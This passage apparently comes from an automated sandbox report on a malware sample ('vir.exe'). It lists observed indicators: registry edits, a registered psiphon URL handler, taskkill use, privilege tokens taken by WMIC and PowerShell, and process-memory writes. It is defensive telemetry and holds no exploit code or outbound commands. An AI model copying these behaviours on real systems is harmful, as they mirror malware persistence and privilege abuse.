pid Process 5056 ipconfig.exe -
Kills process with taskkill 4 IoCs
pid Process 4920 taskkill.exe 6776 taskkill.exe 6756 taskkill.exe 6848 taskkill.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEFixedFontName = "Sylfaen" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEPropFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEFixedFontName = "Microsoft Yi Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38\IEFixedFontName = "MV Boli" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\23 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEPropFontName = "MS PGothic" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39\IEFixedFontName = "Mongolian Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\36 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEFixedFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21\IEFixedFontName = "Microsoft Himalaya" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17\IEPropFontName = "Tunga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEFixedFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11 reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEPropFontName = "Sylfaen" reg.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ nqhFWmq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" nqhFWmq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer nqhFWmq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" nqhFWmq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a968b372-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" nqhFWmq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\psiphon 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\psiphon\URL Protocol 3.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\psiphon\shell\open\command 3.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\\bloatware\\3.exe\" -- \"%1\"" 3.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\psiphon\ = "URL:psiphon" 3.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\psiphon\shell 3.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\psiphon\shell\open 3.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2656 PING.EXE 6240 PING.EXE 4884 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4956 msedge.exe 4956 msedge.exe 3976 msedge.exe 3976 msedge.exe 5860 msedge.exe 5860 msedge.exe 6496 identity_helper.exe 6496 identity_helper.exe 5044 tasklist.exe 5044 tasklist.exe 6336 WinaeroTweaker-1.40.0.0-setup.tmp 6336 WinaeroTweaker-1.40.0.0-setup.tmp 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 7020 powershell.exe 6040 powershell.exe 6040 powershell.exe 6040 powershell.exe 1836 qjnar5mhQPzpks9OpNlu8jqr.exe 1836 qjnar5mhQPzpks9OpNlu8jqr.exe 1836 qjnar5mhQPzpks9OpNlu8jqr.exe 1836 qjnar5mhQPzpks9OpNlu8jqr.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 3612 powershell.exe 3612 powershell.exe 3612 powershell.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 5624 powershell.exe 5624 powershell.exe 5624 powershell.exe 6056 powershell.exe 6056 powershell.exe 6056 powershell.exe 1260 powershell.exe 1260 powershell.exe 1260 powershell.exe 6424 powershell.exe 6424 powershell.exe 6424 powershell.exe 4680 powershell.EXE 4680 powershell.EXE 4680 powershell.EXE 6852 msedge.exe 6852 msedge.exe 6852 msedge.exe 6852 msedge.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 4912 pKObCuHpjwoZZM8nL5N17RI3.exe 4772 AddInProcess32.exe 4772 AddInProcess32.exe 6524 powershell.exe 6524 powershell.exe 6524 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
pid Process 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4920 taskkill.exe Token: SeDebugPrivilege 856 Rover.exe Token: SeDebugPrivilege 5044 tasklist.exe Token: SeDebugPrivilege 6776 taskkill.exe Token: SeDebugPrivilege 6756 taskkill.exe Token: SeDebugPrivilege 6848 taskkill.exe Token: SeDebugPrivilege 7036 scary.exe Token: SeDebugPrivilege 6592 Romilyaa.exe Token: SeDebugPrivilege 7020 powershell.exe Token: SeDebugPrivilege 6200 regsvcs.exe Token: SeDebugPrivilege 6040 powershell.exe Token: SeManageVolumePrivilege 1836 qjnar5mhQPzpks9OpNlu8jqr.exe Token: SeDebugPrivilege 4912 pKObCuHpjwoZZM8nL5N17RI3.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeDebugPrivilege 5624 powershell.exe Token: SeIncreaseQuotaPrivilege 5096 WMIC.exe Token: SeSecurityPrivilege 5096 WMIC.exe Token: SeTakeOwnershipPrivilege 5096 WMIC.exe Token: SeLoadDriverPrivilege 5096 WMIC.exe Token: SeSystemProfilePrivilege 5096 WMIC.exe Token: SeSystemtimePrivilege 5096 WMIC.exe Token: SeProfSingleProcessPrivilege 5096 WMIC.exe Token: SeIncBasePriorityPrivilege 5096 WMIC.exe Token: SeCreatePagefilePrivilege 5096 WMIC.exe Token: SeBackupPrivilege 5096 WMIC.exe Token: SeRestorePrivilege 5096 WMIC.exe Token: SeShutdownPrivilege 5096 WMIC.exe Token: SeDebugPrivilege 5096 WMIC.exe Token: SeSystemEnvironmentPrivilege 5096 WMIC.exe Token: SeRemoteShutdownPrivilege 5096 WMIC.exe Token: SeUndockPrivilege 5096 WMIC.exe Token: SeManageVolumePrivilege 5096 WMIC.exe Token: 33 5096 WMIC.exe Token: 34 5096 WMIC.exe Token: 35 5096 WMIC.exe Token: 36 5096 WMIC.exe Token: SeIncreaseQuotaPrivilege 5096 WMIC.exe Token: SeSecurityPrivilege 5096 WMIC.exe Token: SeTakeOwnershipPrivilege 5096 WMIC.exe Token: SeLoadDriverPrivilege 5096 WMIC.exe Token: SeSystemProfilePrivilege 5096 WMIC.exe Token: SeSystemtimePrivilege 5096 WMIC.exe Token: SeProfSingleProcessPrivilege 5096 WMIC.exe Token: SeIncBasePriorityPrivilege 5096 WMIC.exe Token: SeCreatePagefilePrivilege 5096 WMIC.exe Token: SeBackupPrivilege 5096 WMIC.exe Token: SeRestorePrivilege 5096 WMIC.exe Token: SeShutdownPrivilege 5096 WMIC.exe Token: SeDebugPrivilege 5096 WMIC.exe Token: SeSystemEnvironmentPrivilege 5096 WMIC.exe Token: SeRemoteShutdownPrivilege 5096 WMIC.exe Token: SeUndockPrivilege 5096 WMIC.exe Token: SeManageVolumePrivilege 5096 WMIC.exe Token: 33 5096 WMIC.exe Token: 34 5096 WMIC.exe Token: 35 5096 WMIC.exe Token: 36 5096 WMIC.exe Token: SeDebugPrivilege 6056 powershell.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeDebugPrivilege 6424 powershell.exe Token: SeDebugPrivilege 4680 powershell.EXE Token: SeDebugPrivilege 4772 AddInProcess32.exe Token: SeDebugPrivilege 6524 powershell.exe Token: 33 6220 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 56 IoCs
pid Process 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 1936 efsui.exe 1936 efsui.exe 1936 efsui.exe 6336 WinaeroTweaker-1.40.0.0-setup.tmp 6592 Romilyaa.exe 2652 dkFVZlmtLqTxxrtOi9FElXnO.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe -
Suspicious use of SendNotifyMessage 53 IoCs
pid Process 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 1936 efsui.exe 1936 efsui.exe 1936 efsui.exe 6592 Romilyaa.exe 2652 dkFVZlmtLqTxxrtOi9FElXnO.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe 2864 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5972 3.exe 5972 3.exe 6592 Romilyaa.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2804 wrote to memory of 1300 2804 vir.exe 89 PID 2804 wrote to memory of 1300 2804 vir.exe 89 PID 2804 wrote to memory of 1300 2804 vir.exe 89 PID 2804 wrote to memory of 2488 2804 vir.exe 90 PID 2804 wrote to memory of 2488 2804 vir.exe 90 PID 2804 wrote to memory of 2488 2804 vir.exe 90 PID 2488 wrote to memory of 1312 2488 cmd.exe 93 PID 2488 wrote to memory of 1312 2488 cmd.exe 93 PID 2488 wrote to memory of 1312 2488 cmd.exe 93 PID 2488 wrote to memory of 4216 2488 cmd.exe 95 PID 2488 wrote to memory of 4216 2488 cmd.exe 95 PID 2488 wrote to memory of 4216 2488 cmd.exe 95 PID 2488 wrote to memory of 2656 2488 cmd.exe 98 PID 2488 wrote to memory of 2656 2488 cmd.exe 98 PID 2488 wrote to memory of 2656 2488 cmd.exe 98 PID 1312 wrote to memory of 1676 1312 cmd.exe 99 PID 1312 wrote to memory of 1676 1312 cmd.exe 99 PID 1312 wrote to memory of 1676 1312 cmd.exe 99 PID 4216 wrote to memory of 5056 4216 cmd.exe 100 PID 4216 wrote to memory of 5056 4216 cmd.exe 100 PID 4216 wrote to memory of 5056 4216 cmd.exe 100 PID 1312 wrote to memory of 3344 1312 cmd.exe 101 PID 1312 wrote to memory of 3344 1312 cmd.exe 101 PID 1312 wrote to memory of 3344 1312 cmd.exe 101 PID 2488 wrote to memory of 4920 2488 cmd.exe 102 PID 2488 wrote to memory of 4920 2488 cmd.exe 102 PID 2488 wrote to memory of 4920 2488 cmd.exe 102 PID 1312 wrote to memory of 3660 1312 cmd.exe 